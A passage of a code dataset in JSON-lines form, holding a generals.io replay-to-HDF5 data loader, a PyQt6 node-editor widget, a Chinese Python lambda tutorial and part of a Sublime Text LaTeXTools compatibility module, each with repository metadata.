(np.sum(oracle_armies[oracle_tiles == enemy]), np.sum(oracle_tiles == enemy))\n player_stats = (np.sum(oracle_armies[oracle_tiles == i]), np.sum(oracle_tiles == i))\n #prev_state = np.copy(game_states[i])\n oracle_states[i] = update_state(oracle_states[i], game.turn, oracle_tiles, oracle_armies, oracle_cities, oracle_generals, i, enemy, player_stats, enemy_stats, last_moves[i])\n current_oracle_state = np.copy(oracle_states[i])\n \n # Initialize and update regular game state\n tiles, armies, cities, generals = map_states[i]\n tiles = tiles.reshape(map_height, map_width)\n armies = armies.reshape(map_height, map_width)\n prev_state = np.copy(game_states[i])\n game_states[i] = update_state(game_states[i], game.turn, tiles, armies, cities, generals, i, enemy, player_stats, enemy_stats, last_moves[i])\n current_state = np.copy(game_states[i])\n \n # Skip turns that don't have a move or are randomly filtered out\n if target_move is None:\n continue\n \n # Generate the memory efficient position and direction targets\n target = generate_target_move(game, target_move)\n \n # Store the last move made by this player\n y, x, direction, height, width, winner, turn = target\n last_moves[i] = generate_target_tensors(x, y, direction)\n \n if np.random.binomial(1, 0.1):\n continue\n \n # Add the oracle target\n oracle_target = current_oracle_state[:, :, (0,1,2,3,4,5,6,10)].flatten()\n final_target = target#np.concatenate((target, oracle_target), axis=0)\n \n # Add the final state input and target to the lists\n replay_inputs[i].append(current_state)\n replay_targets[i].append(np.copy(final_target))\n \n # Update the game and proceed to the next turn\n game.update()\n \n print(\"Ending simulation with winner {} after {} turns...\".format(game.winner(), game.turn))\n game_winner = game.winner()\n \n # Check to make sure no failed games with no winner\n if game_winner is None:\n for i in range(25): \n print('ERROR! ENDED GAME WITH NO WINNER!!!!! SKIPPING')\n continue\n \n print(\"Sampled \", (len(replay_inputs[0]) + len(replay_inputs[1])))\n # replay_input should be shape (N, 22, 22, 11) for N sampled states\n # replay_target should be shape (N, ((22, 22), (5), (1)))\n # Each sampled N state has a target, which is a:\n # 22x22 categorical prediction of the tile that moved\n # A 5-element vector denoting the direction of the movement (or still)\n # A 1-element binary vector denoting whether the movement was a 50% army move or not\n # A single target should be (tilePosition, moveDirection, is50Move)\n \n # Randomly determine whether this game will be validation or training\n dataset_name = \"validation\" if np.random.binomial(1, validation_ratio) else \"training\"\n \n # Add the sample states and targets to the thread-safe queue\n for player_id in [0, 1]:\n if (replay['stars'][player_id] < MIN_REPLAY_STARS):# or replay['usernames'][player_id] != \"Dept of Defense\"):\n continue\n target_length = len(replay_targets[player_id][0])\n \n inputs = np.concatenate(replay_inputs[player_id],axis=0).reshape(-1, ORIGINAL_MAP_WIDTH, ORIGINAL_MAP_WIDTH, MAP_CHANNELS).astype(np.float32)\n targets = np.concatenate(replay_targets[player_id],axis=0).reshape(-1, target_length).astype(np.float32)\n \n # Set whether the player won or not in their targets\n targets[:,5] = 1 if player_id == game_winner else -1\n # Set how many turns were remaining in the game from this move onward\n targets[:, 6] = game.turn - targets[:, 6] - 1\n \n replay_inputs[player_id] = inputs\n replay_targets[player_id] = targets\n \n # Add the collected sample frames to our disk collection\n lock.acquire()\n #data_input.put(replay_inputs[player_id].astype(np.float32))\n #data_target.put(replay_targets[player_id].astype(np.float32))\n add_to_dataset(file_name, dataset_name, replay_inputs[player_id], replay_targets[player_id])\n lock.release()\n except:\n e = sys.exc_info()[0]\n print(e)\n print(traceback.format_exc())\n print(\"----------------------ERROR DURING LOAD! Skipping...\")\n pass\n print(\"Thread {} is finished loading!\".format(threadId))\n return 0\n\ndef fetch_replay_names(replayFolder, gamesToFetch, required_players=None):\n replayDirectory = os.listdir(replayFolder)\n random.shuffle(list(replayDirectory))\n replayNames = []\n for replay in replayDirectory:\n if len(replayNames) > gamesToFetch*2:\n break\n if replay[-10:] == '.gioreplay':\n if required_players is not None:\n #print(\"Load \", replay, \" out of \", len(replayNames), \" with a total of \", len(replayDirectory))\n replay_file = load_replay(replayFolder, replay)\n if len(replay_file['usernames']) != required_players:\n continue\n replayNames.append(replay)\n replayIndices = np.random.choice(np.arange(len(replayNames)), size=min(len(replayNames), gamesToFetch), replace=False)\n replayNames = np.array(replayNames)[replayIndices]\n \n return replayNames\n\n# Example usage: Sample 64 frames randomly from the training dataset of the FlobotFrames.h5 file\n# X, y = sample_dataset(\"FlobotFrames\", \"training\", 64)\ndef sample_dataset(file_name, dataset_name=\"training\", sample_size = 64, sample_indices=None, data_folder='./data'):\n file_name = '{}/{}.h5'.format(data_folder, file_name)\n \n with h5py.File(file_name, 'r') as h5f:\n X_data = h5f[\"{}_input\".format(dataset_name)]\n y_data = h5f[\"{}_target\".format(dataset_name)] \n \n if sample_indices is None:\n n = X_data.shape[0]\n sample_size = min(sample_size, n)\n sample_indices = np.random.choice(np.arange(n), size=sample_size, replace=False)\n \n X, y = X_data[sample_indices], y_data[sample_indices]\n #X, y = X_data[10204:sample_size+10204], y_data[0:sample_size]\n \n return np.copy(X), np.copy(y)\n\ndef _dataset_exists(file_path, dataset_name, data_folder='./data'):\n if not os.path.isfile(file_path):\n return False\n \n with h5py.File(file_path, 'a') as h5f:\n exists = (dataset_name in h5f)\n \n return exists\n\ndef copy_dataset(old_file_name, new_file_name, data_folder='./data', chunk_size=5000):\n oldFile = h5py.File('{}/{}.h5'.format(data_folder, old_file_name), 'a')\n newFile = h5py.File('{}/{}.h5'.format(data_folder, new_file_name), 'w')\n \n for dataset_name in ['validation', 'training']:\n for data_type in ['target', 'input']:\n data_name = '{}_{}'.format(dataset_name, data_type)\n dataset = newFile.create_dataset(data_name, oldFile[data_name].shape, chunks=None)\n n = oldFile[data_name].shape[0]\n i = n\n while i > 0:\n start = max(0, i - chunk_size)\n dataset[start:i] = oldFile[data_name][start:i]\n oldFile[data_name].resize(start, axis=0)\n print(i, start, oldFile[data_name].shape, data_name)\n i = start\n print(\"Completed transfer for \", data_name, \" so deleting now...\")\n del oldFile[data_name]\n oldFile.close()\n oldFile = h5py.File('{}/{}.h5'.format(data_folder, old_file_name), 'a')\n \n oldFile.close()\n newFile.close()\n \ndef get_dataset_info(file_name, dataset_name, data_folder='./data'):\n file_path = '{}/{}.h5'.format(data_folder, file_name)\n with h5py.File(file_path, 'a') as h5f:\n #print(\"Fetching info for \", file_name, \" \", file_path, dataset_name)\n X_shape = h5f[\"{}_input\".format(dataset_name)].shape\n y_shape = h5f[\"{}_target\".format(dataset_name)].shape\n \n return X_shape, y_shape\n \n# Example: Add some newly collected training input and target frames to dataset\n# add_to_dataset(\"FlobotFrames\", \"training\", input_samples, target_samples)\ndef add_to_dataset(file_name, dataset_name, X, y, data_folder='./data'):\n file_path = '{}/{}.h5'.format(data_folder, file_name)\n #print(\"Adding to file path \", file_path, \" with dataset name\", dataset_name)\n \n if not _dataset_exists(file_path, \"{}_input\".format(dataset_name), data_folder):\n _initialize_dataset(file_path, \"{}_target\".format(dataset_name), y, data_folder)\n _initialize_dataset(file_path, \"{}_input\".format(dataset_name), X, data_folder)\n else:\n _add_samples_to_dataset(file_path, \"{}_input\".format(dataset_name), X, data_folder)\n _add_samples_to_dataset(file_path, \"{}_target\".format(dataset_name), y, data_folder)\n\n\ndef _initialize_dataset(file_path, dataset_name, data, data_folder='./data'):\n with h5py.File(file_path, 'a') as h5f:\n max_dataset_shape = list(data.shape)\n max_dataset_shape[0] = None\n max_dataset_shape = tuple(max_dataset_shape)\n dataset = h5f.create_dataset(dataset_name, data.shape, maxshape=max_dataset_shape)\n dataset[:] = np.copy(data)\n #print(\"initializing! \", max_dataset_shape, data.shape, dataset_name, h5f[dataset_name].shape)\n\ndef _add_samples_to_dataset(file_path, dataset_name, data, data_folder='./data'):\n with h5py.File(file_path, 'a') as h5f:\n dataset = h5f[dataset_name]\n n = dataset.shape[0]\n new_n = n + data.shape[0]\n dataset.resize(new_n, axis=0)\n dataset[n:] = data\n #print(\"Old n \", n, \" versus new n\", new_n)\n\ndef load_all_replays(file_name, replayFolder, gamesToLoad, threadCount=8): \n manager = multiprocessing.Manager()\n THREADCOUNT = threadCount\n replaySubsets = [[] for thread in range(THREADCOUNT)]\n replayNames = fetch_replay_names(replayFolder, gamesToLoad, 2)\n replay_count = len(replayNames)\n for index, replay_name in enumerate(replayNames):\n replaySubsets[index % THREADCOUNT].append((index, replay_name))\n \n print(\"Generating training data...\")\n start_time = time.time()\n threads = []\n lock = multiprocessing.Lock()\n for threadId in range(THREADCOUNT):\n threadArgs = (threadId, replayFolder, replaySubsets[threadId], file_name, lock, 0.1)\n thread = multiprocessing.Process(target=load_replays, args = threadArgs) \n thread.daemon = True\n threads.append(thread)\n thread.start()\n \n for threadId in range(THREADCOUNT):\n print(\"Joining on replay loading thread {}\".format(threadId))\n threads[threadId].join()\n \n load_duration = time.time() - start_time\n print(\"Finished loading {} games in {} seconds!\".format(replay_count, load_duration))\n training_input_shape, training_target_shape = get_dataset_info(file_name, \"training\")\n validation_input_shape, validation_target_shape = get_dataset_info(file_name, \"validation\")\n print(\"Training data shapes: \", training_input_shape, training_target_shape)\n print(\"Validation data shapes: \", validation_input_shape, validation_target_shape)\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 5:\n USER_ID = int(sys.argv[1])\n REPLAY_FOLDER = sys.argv[2]\n REPLAY_LIMIT = int(sys.argv[3])\n THREAD_COUNT = int(sys.argv[4])\n X, y = load_all_replays(\"./replays\", 5, 1)\n print(X.shape)\n print(y.shape)\n","repo_name":"TySayers/generals-io-bot","sub_path":"LoadReplayData.py","file_name":"LoadReplayData.py","file_ext":"py","file_size_in_byte":18871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17583957336","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\n\nfrom PyQt6.QtGui import *\nfrom PyQt6.QtCore import *\nfrom PyQt6.QtWidgets import *\n\nfrom qdstatescene import *\nfrom qdstateconfg import QD_StateConfg\nfrom qddraglistbox import QD_DragListBox\nfrom qdopnode import *\nfrom qdedge import *\nfrom qdviewgfx import MODE_EDGE_DRAG, QD_ViewGfx # , MODE_EDGES_REROUTING\nfrom qdutils import *\n\n\nclass QD_StateWidget(utils.disableAutoDelete(QSplitter)):\n Scene_class = QD_StateScene\n\n\n def __init__(self, node: 'QD_StateNode' = None, parent: QWidget = None):\n super().__init__(parent)\n\n self.node = node\n self.filename = None\n\n self.initUI()\n\n self.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose)\n\n self.setTitle()\n self.initNewNodeActions()\n\n self.scene.addHasBeenModifiedListener(self.setTitle)\n self.scene.history.addHistoryRestoredListener(self.onHistoryRestored)\n self.scene.addDragEnterListener(self.onDragEnter)\n self.scene.addDropListener(self.onDrop)\n self.scene.setNodeClassSelector(self.getNodeClassFromData)\n\n self.__closeEventListeners = []\n\n\n def initUI(self):\n self.confg = QD_StateConfg()\n self.addWidget(self.confg.gfx)\n\n self.scene = self.__class__.Scene_class()\n self.view = QD_ViewGfx(self.scene.gfx)\n self.addWidget(self.view)\n\n self.draglist = QD_DragListBox()\n self.draglist.setMaximumWidth(200)\n self.addWidget(self.draglist)\n\n self.setSizes([200, 800, 200])\n\n\n def getNodeClassFromData(self, data):\n if 'op_code' not in data:\n return QD_OpNode\n return utils.getOpNodeType(data['op_code'])\n\n def doEvalOutputs(self):\n # eval all output nodes\n for node in self.scene.nodes:\n if node.__class__.__name__ == \"CalcNode_Output\":\n node.eval()\n\n def onHistoryRestored(self):\n self.doEvalOutputs()\n\n\n def fileNew(self):\n self.scene.clear()\n self.filename = None\n self.scene.history.clear()\n self.scene.history.storeInitialHistoryStamp()\n\n\n def fileLoad(self, filename: str):\n QApplication.setOverrideCursor(Qt.CursorShape.WaitCursor)\n try:\n with open(filename, \"r\", encoding='utf-8') as f:\n data = json.load(f)\n\n if data['version'] != confg.APP_VERSION:\n QMessageBox.warning(self, \"Incompatible json file version: %s\" % data['version'], \"Current version is %s\" % confg.APP_VERSION)\n return False\n\n self.confg.deserialize(data['confg'])\n self.scene.deserialize(data['scene'])\n\n self.scene.has_been_modified = False\n self.scene.history.clear()\n self.scene.history.storeInitialHistoryStamp()\n\n self.filename = filename\n\n self.doEvalOutputs()\n return True\n\n except Exception as e:\n QMessageBox.warning(self, \"Error loading json file: %s\" % filename, str(e))\n return False\n\n except json.JSONDecodeError as e:\n QMessageBox.warning(self, \"Invalid json file: %s\" % filename, str(e))\n return False\n\n finally:\n QApplication.restoreOverrideCursor()\n\n\n def fileSave(self, filename: str = None):\n if filename is not None:\n self.filename = filename\n\n QApplication.setOverrideCursor(Qt.CursorShape.WaitCursor)\n\n with open(self.filename, \"w\", encoding='utf-8', newline='\\n') as f:\n json.dump(self.serialize(), f, ensure_ascii=False, indent=4)\n print('saving to %s was successfull.' % self.filename)\n self.scene.has_been_modified = False\n\n QApplication.restoreOverrideCursor()\n return True\n\n\n def initNewNodeActions(self):\n self.node_actions = {}\n for node in utils.getOpNodeTypes():\n self.node_actions[node.op_code] = QAction(QIcon(node.icon), node.opTitle)\n self.node_actions[node.op_code].setData(node.op_code)\n\n def createNodesContextMenu(self):\n context_menu = QMenu(self)\n for type in utils.getOpNodeTypes():\n context_menu.addAction(self.node_actions[type.op_code])\n return context_menu\n\n def onAttrTimeoutEditingFinished(self):\n if self._attr_timeout_edit.text():\n if int(self._attr_timeout_edit.text()) < 0:\n self._attr_timeout_edit.setText(\"无限制\")\n\n\n def isModified(self) -> bool:\n return self.scene.isModified()\n\n\n def isFilenameSet(self) -> bool:\n return self.filename is not None\n\n\n def getSelectedItems(self) -> list:\n return self.scene.getSelectedItems()\n\n def hasSelectedItems(self) -> bool:\n return self.getSelectedItems() != []\n\n\n def canUndo(self) -> bool:\n return self.scene.history.canUndo()\n\n\n def canRedo(self) -> bool:\n return self.scene.history.canRedo()\n\n def getUserFriendlyFilename(self) -> str:\n name = os.path.basename(self.filename) if self.isFilenameSet() else \"New State\"\n return name + (\"*\" if self.isModified() else \"\")\n\n\n def setTitle(self):\n self.setWindowTitle(self.getUserFriendlyFilename())\n\n def addCloseEventListener(self, callback):\n self.__closeEventListeners.append(callback)\n\n def closeEvent(self, event):\n for callback in self.__closeEventListeners:\n callback(self, event)\n\n def onDragEnter(self, event):\n if event.mimeData().hasFormat(LISTBOX_MIMETYPE):\n event.acceptProposedAction()\n else:\n # print(\" ... denied drag enter event\")\n event.setAccepted(False)\n\n def onDrop(self, event):\n if event.mimeData().hasFormat(LISTBOX_MIMETYPE):\n eventData = event.mimeData().data(LISTBOX_MIMETYPE)\n dataStream = QDataStream(eventData, QIODevice.OpenModeFlag.ReadOnly)\n pixmap = QPixmap()\n dataStream >> pixmap\n op_code = dataStream.readInt()\n text = dataStream.readQString()\n\n mouse_position = event.position()\n scene_position = self.scene.gfx.views()[0].mapToScene(round(mouse_position.x()), round(mouse_position.y()))\n\n if confg.DEBUG:\n print(\"GOT DROP: [%d] '%s'\" % (op_code, text), \"mouse:\", mouse_position, \"scene:\", scene_position)\n\n try:\n node = utils.getOpNodeType(op_code)(self.scene)\n node.setPos(scene_position.x(), scene_position.y())\n self.scene.history.storeHistory(\"Created node %s\" % node.__class__.__name__)\n except Exception as e:\n utils.dumpExcept(e)\n\n event.setDropAction(Qt.DropAction.MoveAction)\n event.accept()\n else:\n # print(\" ... drop ignored, not requested format '%s'\" % LISTBOX_MIMETYPE)\n event.ignore()\n\n def contextMenuEvent(self, event):\n try:\n item = self.scene.getItemAt(event.pos() - self.view.pos())\n if confg.DEBUG:\n print(item)\n\n if type(item) == QGraphicsProxyWidget:\n item = item.widget()\n\n if hasattr(item, 'node') or hasattr(item, 'socket'):\n self.handleNodeContextMenu(event)\n elif hasattr(item, 'edge'):\n self.handleEdgeContextMenu(event)\n # elif item is None:\n else:\n self.handleNewNodeContextMenu(event)\n\n return super().contextMenuEvent(event)\n except Exception as e:\n utils.dumpExcept(e)\n\n def handleNodeContextMenu(self, event):\n if confg.DEBUG:\n print(\"CONTEXT: NODE\")\n context_menu = QMenu(self)\n markDirtyAct = context_menu.addAction(\"Mark Dirty\")\n markDirtyDescendantsAct = context_menu.addAction(\"Mark Descendant Dirty\")\n markInvalidAct = context_menu.addAction(\"Mark Invalid\")\n unmarkInvalidAct = context_menu.addAction(\"Unmark Invalid\")\n evalAct = context_menu.addAction(\"Eval\")\n\n addNodeMenu = context_menu.addMenu('Add Node')\n addedActDict = {}\n for type in utils.getOpNodeTypes():\n addedActDict[addNodeMenu.addAction(type.opTitle)] = type\n\n action = context_menu.exec(self.mapToGlobal(event.pos()))\n if action is None:\n return\n\n selected = None\n item = self.scene.getItemAt(event.pos() - self.view.pos())\n\n if isinstance(item, QGraphicsProxyWidget):\n item = item.widget()\n\n if hasattr(item, 'node'):\n selected = item.node\n\n if hasattr(item, 'socket'):\n selected = item.socket.node\n\n if confg.DEBUG:\n print(\"got item:\", selected)\n\n if selected:\n if action == markDirtyAct:\n selected.markDirty()\n\n elif action == markDirtyDescendantsAct:\n selected.markDescendantsDirty()\n\n elif action == markInvalidAct:\n selected.markInvalid()\n\n elif action == unmarkInvalidAct:\n selected.markInvalid(False)\n\n elif action == evalAct:\n val = selected.eval()\n if confg.DEBUG:\n print(\"EVALUATED:\", val)\n\n else:\n for addedAct in addedActDict.keys():\n if action == addedAct:\n print(\"ADDING NODE: %s\" % addedActDict[addedAct].opTitle)\n selected.addSubNode(addedActDict[addedAct])\n break\n\n\n def handleEdgeContextMenu(self, event):\n if confg.DEBUG:\n print(\"CONTEXT: EDGE\")\n context_menu = QMenu(self)\n bezierAct = context_menu.addAction(\"Bezier QD_Edge\")\n directAct = context_menu.addAction(\"Direct QD_Edge\")\n action = context_menu.exec(self.mapToGlobal(event.pos()))\n\n selected = None\n item = self.scene.getItemAt(event.pos())\n if hasattr(item, 'edge'):\n selected = item.edge\n\n if selected and action == bezierAct: selected.edge_type = EdgeType.Bezier\n if selected and action == directAct: selected.edge_type = EdgeType.Direct\n\n # helper functions\n def determine_target_socket_of_node(self, was_dragged_flag, new_calc_node):\n target_socket = None\n if was_dragged_flag:\n if new_calc_node.getSocket(SockType.In):\n target_socket = new_calc_node.getSocket(SockType.In)\n else:\n if new_calc_node.getSocket(SockType.Out_1):\n target_socket = new_calc_node.getSocket(SockType.Out_1)\n elif new_calc_node.getSocket(SockType.Out_0):\n target_socket = new_calc_node.getSocket(SockType.Out_0)\n return target_socket\n\n def finish_new_node_state(self, new_calc_node):\n self.scene.doDeselectItems()\n new_calc_node.gfx.doSelect(True)\n new_calc_node.gfx.onSelected()\n\n def handleNewNodeContextMenu(self, event):\n if confg.DEBUG:\n print(\"CONTEXT: EMPTY SPACE\")\n\n context_menu = self.createNodesContextMenu()\n action = context_menu.exec(self.mapToGlobal(event.pos()))\n\n if action is not None:\n new_calc_node = utils.getOpNodeType(action.data())(self.scene)\n scene_pos = self.scene.getView().mapToScene(event.pos() - self.view.pos())\n new_calc_node.setPos(scene_pos.x(), scene_pos.y())\n if confg.DEBUG:\n print(\"Selected node:\", new_calc_node)\n\n if self.scene.getView().mode == MODE_EDGE_DRAG:\n # if we were dragging an edge...\n target_socket = self.determine_target_socket_of_node(self.scene.getView().dragStartSocket.is_output, new_calc_node)\n if target_socket is not None:\n self.scene.getView().edgeDragEnd(target_socket.gfx)\n self.finish_new_node_state(new_calc_node)\n\n else:\n self.scene.history.storeHistory(\"Created %s\" % new_calc_node.__class__.__name__)\n\n\n def addNodes(self):\n node1 = QD_OpNode(self.scene, \"My Awesome QD_OpNode 1\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n node2 = QD_OpNode(self.scene, \"My Awesome QD_OpNode 2\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n node3 = QD_OpNode(self.scene, \"My Awesome QD_OpNode 3\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n node1.setPos(-350, -250)\n node2.setPos(-75, 0)\n node3.setPos(200, -200)\n\n edge1 = QD_Edge(self.scene, node1.getSocket(SocketType.Out_True), node2.getSocket(SocketType.In), edge_type=EdgeType.Bezier)\n edge2 = QD_Edge(self.scene, node2.getSocket(SocketType.Out_True), node3.getSocket(SocketType.In), edge_type=EdgeType.Bezier)\n edge3 = QD_Edge(self.scene, node1.getSocket(SocketType.Out_True), node3.getSocket(SocketType.In), edge_type=EdgeType.Bezier)\n\n self.scene.history.storeInitialHistoryStamp()\n\n\n def addCustomNode(self):\n from qdopnodecontent import QD_OpNodeContent\n from qdserializable import QD_Serializable\n\n class NNodeContent(QLabel): # , QD_Serializable):\n def __init__(self, node, parent=None):\n super().__init__(\"FooBar\")\n self.node = node\n self.setParent(parent)\n\n class NNode(QD_OpNode):\n NodeContent_class = NNodeContent\n\n self.scene.setNodeClassSelector(lambda data: NNode)\n node = NNode(self.scene, \"A Custom QD_OpNode 1\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n\n print(\"node content:\", node.content)\n\n\n def serialize(self) -> dict:\n return {'version': confg.APP_VERSION, 'confg': self.confg.serialize(), 'scene': self.scene.serialize()}\n\n\n def addDebugContent(self):\n greenBrush = QBrush(Qt.green)\n outlinePen = QPen(Qt.black)\n outlinePen.setWidth(2)\n\n rect = self.gfx.addRect(-100, -100, 80, 100, outlinePen, greenBrush)\n rect.setFlag(QGraphicsItem.ItemIsMovable)\n\n text = self.gfx.addText(\"This is my Awesome text!\", QFont(\"Ubuntu\"))\n text.setFlag(QGraphicsItem.ItemIsSelectable)\n text.setFlag(QGraphicsItem.ItemIsMovable)\n text.setDefaultTextColor(QColor.fromRgbF(1.0, 1.0, 1.0))\n\n widget1 = QPushButton(\"Hello World\")\n proxy1 = self.gfx.addWidget(widget1)\n proxy1.setFlag(QGraphicsItem.ItemIsMovable)\n proxy1.setPos(0, 30)\n\n widget2 = QTextEdit()\n proxy2 = self.gfx.addWidget(widget2)\n proxy2.setFlag(QGraphicsItem.ItemIsSelectable)\n proxy2.setPos(0, 60)\n\n line = self.gfx.addLine(-200, -200, 400, -100, outlinePen)\n line.setFlag(QGraphicsItem.ItemIsMovable)\n line.setFlag(QGraphicsItem.ItemIsSelectable)\n","repo_name":"etorth/pyqt-node-editor-core","sub_path":"src/qdstatewidget.py","file_name":"qdstatewidget.py","file_ext":"py","file_size_in_byte":14920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43265640199","text":"\"\"\"\n lambda表达式\n 匿名方法\n 语法:\n lambda 参数:方法体\n (方法体中不写return)\n\"\"\"\n\n# def func01(a, b):\n# return a > b\n#\n#\n# print(func01(10, 20))\n\n# 语法:用lambda替换def,要参数,不要小括号,保留冒号,不要return,保留方法体。最终效果等同于上述函数\n# 1. 有参数有返回值\nfunc01 = lambda a, b: a > b # 用一个变量去接收\nprint(func01(10, 20)) # 调用时,传入参数即可\n\n# 2. 无参数有返回值\n# def func02():\n# return \"ok\"\n#\n# print(func02())\n\nfunc02 = lambda: \"ok\"\nprint(func02())\n\n\n# 3. 无参数无返回值\ndef func03():\n print(\"ok\")\n\n\nfunc03()\n\nfunc03 = lambda: print(\"ok\")\nfunc03()\n\n\n# 4. 有参数无返回值\ndef func04(a):\n print(a)\n\n\nfunc04(100)\nfunc04 = lambda a: print(a)\nfunc04(100)\n\n\n# 5. lambda不支持赋值语句\ndef func05(iterable):\n iterable[0] = 100\n\n\nlist01 = [1]\nfunc05(list01)\nprint(list01)\n\n\n# func05 = lambda iterable:iterable[0] = 100\n\n# 6. lambda不支持多条语句\ndef func06(a, b):\n print(a)\n print(b)\n\n\nfunc06(10, 20)\n# func06 = lambda a, b: print(a) print(b)\n","repo_name":"fenglinhuoshan-xun/pythonLearning","sub_path":"stage1/PYTHON_ADVANCED/day03 函数式编程/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73027152693","text":"# This module provides some functions that handle differences between ST2 and\n# ST3. For the most part, they provide ST2-compatible functionality that is\n# already available in ST3.\nfrom __future__ import print_function\n\nimport codecs\nimport json\nimport os\nimport re\nimport sublime\nimport sys\n\ntry:\n from latextools_utils.external_command import (\n check_output, external_command\n )\n from latextools_utils.settings import get_setting\n from latextools_utils.system import which\nexcept ImportError:\n from .external_command import check_output, external_command\n from .settings import get_setting\n from .system import which\n\n_ST3 = sublime.version() >= '3000'\n\n\n__all__ = ['normalize_path', 'get_project_file_name']\n\n_ST3 = sublime.version() >= '3000'\n\n# used by get_sublime_exe()\nSUBLIME_VERSION = re.compile(r'Build (\\d{4})', re.UNICODE)\n\n\n# normalizes the paths stored in sublime session files on Windows\n# from:\n# \t/c/path/to/file.ext\n# to:\n# \tc:\\path\\to\\file.ext\ndef normalize_path(path):\n if sublime.platform() == 'windows':\n return os.path.normpath(\n path.lstrip('/').replace('/', ':/', 1)\n )\n else:\n return path\n\n\n# returns the focus to ST\n# NB its probably good to call this as little as possible since focus-stealing\n# annoys people\ndef focus_st():\n if get_setting('disable_focus_hack', False):\n return\n\n sublime_command = get_sublime_exe()\n\n if sublime_command is not None:\n platform = sublime.platform()\n plat_settings = get_setting(platform, {})\n wait_time = plat_settings.get('keep_focus_delay', 0.5)\n\n # osx is a special snowflake\n if platform == 'osx':\n # sublime_command should be /path/to/Sublime Text.app/Contents/...\n sublime_app = sublime_command.split('/Contents/')[0]\n\n def keep_focus():\n external_command(\n [\n 'osascript', '-e',\n 'tell application \"{0}\" to activate'.format(\n sublime_app\n )\n ],\n use_texpath=False\n )\n else:\n def keep_focus():\n external_command([sublime_command], use_texpath=False)\n\n if hasattr(sublime, 'set_async_timeout'):\n sublime.set_async_timeout(keep_focus, int(wait_time * 1000))\n else:\n sublime.set_timeout(keep_focus, int(wait_time * 1000))\n\n\n# returns the path to the sublime executable\ndef get_sublime_exe():\n '''\n Utility function to get the full path to the currently executing\n Sublime instance.\n '''\n processes = ['subl', 'sublime_text']\n\n def check_processes(st2_dir=None):\n if st2_dir is None or os.path.exists(st2_dir):\n for process in processes:\n try:\n if st2_dir is not None:\n process = os.path.join(st2_dir, process)\n\n m = SUBLIME_VERSION.search(check_output(\n [process, '-v'],\n use_texpath=False\n ))\n if m and m.group(1) == version:\n return process\n except:\n pass\n\n return None\n\n platform = sublime.platform()\n\n plat_settings = get_setting(platform, {})\n sublime_executable = plat_settings.get('sublime_executable', None)\n\n if sublime_executable:\n return sublime_executable\n\n # we cache the results of the other checks, if possible\n if hasattr(get_sublime_exe, 'result'):\n return get_sublime_exe.result\n\n # are we on ST3\n if hasattr(sublime, 'executable_path'):\n get_sublime_exe.result = sublime.executable_path()\n # on osx, the executable does not function the same as subl\n if platform == 'osx':\n get_sublime_exe.result = os.path.normpath(\n os.path.join(\n os.path.dirname(get_sublime_exe.result),\n '..',\n 'SharedSupport',\n 'bin',\n 'subl'\n )\n )\n # on linux, it is preferable to use subl if it points to the\n # correct version see issue #710 for a case where this is useful\n elif (\n platform == 'linux' and\n not get_sublime_exe.result.endswith('subl')\n ):\n subl = which('subl')\n if subl is not None:\n try:\n m = SUBLIME_VERSION.search(check_output(\n [subl, '-v'],\n use_texpath=False\n ))\n\n if m and m.group(1) == sublime.version():\n get_sublime_exe.result = subl\n except:\n pass\n\n return get_sublime_exe.result\n # in ST2 on Windows the Python executable is actually \"sublime_text\"\n elif platform == 'windows' and sys.executable != 'python' and \\\n os.path.isabs(sys.executable):\n get_sublime_exe.result = sys.executable\n return get_sublime_exe.result\n\n # guess-work for ST2\n version = sublime.version()\n\n # hope its on the path\n result = check_processes()\n if result is not None:\n get_sublime_exe.result = result\n return result\n\n # guess the default location\n if platform == 'windows':\n st2_dir = os.path.expandvars('%PROGRAMFILES%\\\\Sublime Text 2')\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n elif platform == 'linux':\n for path in [\n '$HOME/bin',\n '$HOME/sublime_text_2',\n '$HOME/sublime_text',\n '/opt/sublime_text_2',\n '/opt/sublime_text',\n '/usr/local/bin',\n '/usr/bin'\n ]:\n st2_dir = os.path.expandvars(path)\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n else:\n st2_dir = '/Applications/Sublime Text 2.app/Contents/SharedSupport/bin'\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n try:\n folder = check_output(\n ['mdfind', '\"kMDItemCFBundleIdentifier == com.sublimetext.2\"'],\n use_texpath=False\n )\n\n st2_dir = os.path.join(folder, 'Contents', 'SharedSupport', 'bin')\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n except:\n pass\n\n print(\n 'Cannot determine the path to your Sublime installation. Please '\n 'set the \"sublime_executable\" setting in your settings for your '\n 'platform.'\n )\n\n return None\n\n\ndef get_project_file_name(view):\n try:\n return view.window().project_file_name()\n except AttributeError:\n return _get_project_file_name(view)\n\n\n# long, complex hack for ST2 to load the project file from the current session\ndef _get_project_file_name(view):\n try:\n window_id = view.window().id()\n except AttributeError:\n print('Could not determine project file as view does not seem to have an associated window.')\n return None\n\n if window_id is None:\n return None\n\n session = os.path.normpath(\n os.path.join(\n sublime.packages_path(),\n '..',\n 'Settings',\n 'Session.sublime_session'\n )\n )\n\n auto_save_session = os.path.normpath(\n os.path.join(\n sublime.packages_path(),\n '..',\n 'Settings',\n 'Auto Save Session.sublime_session'\n )\n )\n\n session = auto_save_session if os.path.exists(auto_save_session) else session\n\n if not os.path.exists(session):\n return None\n\n project_file = None\n\n # we tell that we have found the current project's project file by\n # looking at the folders registered for that project and comparing it\n # to the open directorys in the current window\n found_all_folders = False\n try:\n with open(session, 'r') as f:\n session_data = f.read().replace('\\t', ' ')\n j = json.loads(session_data, strict=False)\n projects = j.get('workspaces', {}).get('recent_workspaces', [])\n\n for project_file in projects:\n 